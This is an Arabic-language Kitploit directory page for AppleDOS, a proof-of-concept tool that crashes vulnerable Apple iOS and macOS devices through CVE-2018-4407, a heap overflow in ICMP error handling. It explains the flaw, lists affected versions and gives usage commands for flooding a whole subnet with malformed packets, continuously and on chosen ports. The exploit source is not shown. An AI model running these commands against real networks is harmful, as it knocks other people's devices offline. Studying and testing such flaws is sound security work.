Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
AppleDOS — إزعاج أجهزة Apple على الشبكة باستخدام CVE-2018-4407 (تجاوز سعة الكومة في معالجة الحزم الخاطئة) | Kitploit
أدوات/GitHubGitHub/farisv/appledos
تحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالتعلم والتعليم
GitHubfarisv/appledos

AppleDOS

إزعاج أجهزة Apple على الشبكة باستخدام CVE-2018-4407 (تجاوز سعة الكومة في معالجة الحزم الخاطئة)

عرض المستودع
256منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

AppleDOS (CVE-2018-4407)

بناءً على CVE-2018-4407 (https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407)، هذه التغريدة، وهذا الفيديو. الثغرة هي ثغرة تجاوز سعة كومة (heap overflow) في معالجة الحزم الخاطئة عندما يحاول نظام التشغيل إرسال رسالة ICMP تحتوي على أجزاء من الحزمة الخاطئة مرة أخرى إلى المرسل.

يؤدي هذا الدليل الإثباتي (POC) إلى تعطل أجهزة Apple القابلة للاستغلال عن طريق إرسال بيانات حزمة TCP خاطئة تحتوي على خيارات رأس TCP/IP طويلة لتجاوز سعة رسالة ICMP عندما يحاول الجهاز إرسال رسالة الخطأ. تحتاج القدرة على إرسال بيانات الحزمة مباشرة إلى الجهاز (مثلاً على نفس الشبكة المحلية).

إصدارات وأنظمة التشغيل التالية قابلة للاستغلال:

  • Apple iOS 11 والإصدارات الأقدم: جميع الأجهزة
  • Apple macOS High Sierra، حتى الإصدار 10.13.6 وما قبله: جميع الأجهزة
  • Apple macOS Sierra، حتى الإصدار 10.12.6 وما قبله: جميع الأجهزة
  • Apple OS X El Capitan والإصدارات الأقدم: جميع الأجهزة

تحذير

للاستخدام التعليمي فقط. لا تستخدم هذا البرنامج النصي في أنشطة غير قانونية. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر.

مثال

تأكد من تثبيت Python 3 و scapy.

root@kitploit:~
pip install scapy
# أو
pip3 install scapy

قد تحتاج إلى تشغيل البرنامج النصي كجذر (root).

إرسال حزمة خاطئة إلى الشبكة الفرعية 192.168.1.0/24.

root@kitploit:~
sudo ./appledos.py 192.168.1.0/24

عرض عنوان IP بعد إرسال الحزمة.

root@kitploit:~
sudo ./appledos.py --verbose 192.168.1.0/24

إرسال حزمة خاطئة باستمرار إلى الشبكة الفرعية 192.168.1.0/24.

root@kitploit:~
sudo ./appledos.py --continuous 192.168.1.0/24

تغيير منفذ الوجهة (الافتراضي: 80). يمكنك تغييره إلى أي منفذ لأن الأجهزة سترد على أي حزمة واردة إلى أي منفذ، لكن قد تحتاج لمراعاة حظر المنفذ أو جدار الحماية في المضيف أو الشبكة.

root@kitploit:~
sudo ./appledos.py --continuous --port 22 192.168.1.0/24

إرسال حزمة خاطئة إلى عنوان IP واحد فقط.

root@kitploit:~
sudo ./appledos.py 192.168.1.118

تعيين الحد الأقصى لعدد العمال (الافتراضي: 100).

root@kitploit:~
sudo ./appledos.py --worker 10 192.168.1.0/24

ملاحظة

يستخدم هذا البرنامج النصي مكتبة scapy ولديها مشكلة معروفة في التعامل مع /dev/bpf (Berkeley Packet Filter) عند إرسال بيانات الحزمة من نظام تشغيل مثل macOS مع تعدد الخيوط. إذا واجهت رسالة No /dev/bpf handle is available، حاول تقليل عدد العمال إلى 1 أو 2. أو يمكنك ببساطة استخدام Linux كما في فيديو العرض التوضيحي.

تنزيل الأداة